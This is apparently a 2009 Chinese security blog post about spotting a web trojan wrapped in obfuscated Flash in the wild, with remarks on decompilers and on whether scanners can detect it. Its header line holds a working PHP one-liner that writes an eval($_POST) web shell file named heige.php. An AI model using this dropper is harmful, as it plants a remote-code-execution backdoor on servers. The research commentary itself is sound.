<?fputs(fopen('heige.php','w+'),'<?php @eval($_POST[c])? >');?> MSN:SuperHei@ph4nt0m.org GTalk:5up3rh3i@gmail.com
查看文章 |
Flash封装的网马
2009-07-11 21:07
记得去年xgf上知道创宇的小G讲了个关于网马的pp,里面就提到用Flash封装的网马:http://hi.baidu.com/ycosxhack/blog/item/c28fed54d7d0a35fd0090636.html,现在终于在世面上见到了.[可能那些nb公司的人早就抓到过样本了] 见下图:
 呵呵 直接用的上面那个blog的代码: import flash.external.*; 不过值得说明的是,这个样本还采用了flash的混淆'加密'.一般的flash反编译软件没有用,上面我就是用hp的swfscan出来的代码是混淆后的.网马代码根本看不到... 这样混淆了的flash不知道现在的做挂马扫描或者防御的软件是不是可以搞出来.... :) |
最近读者: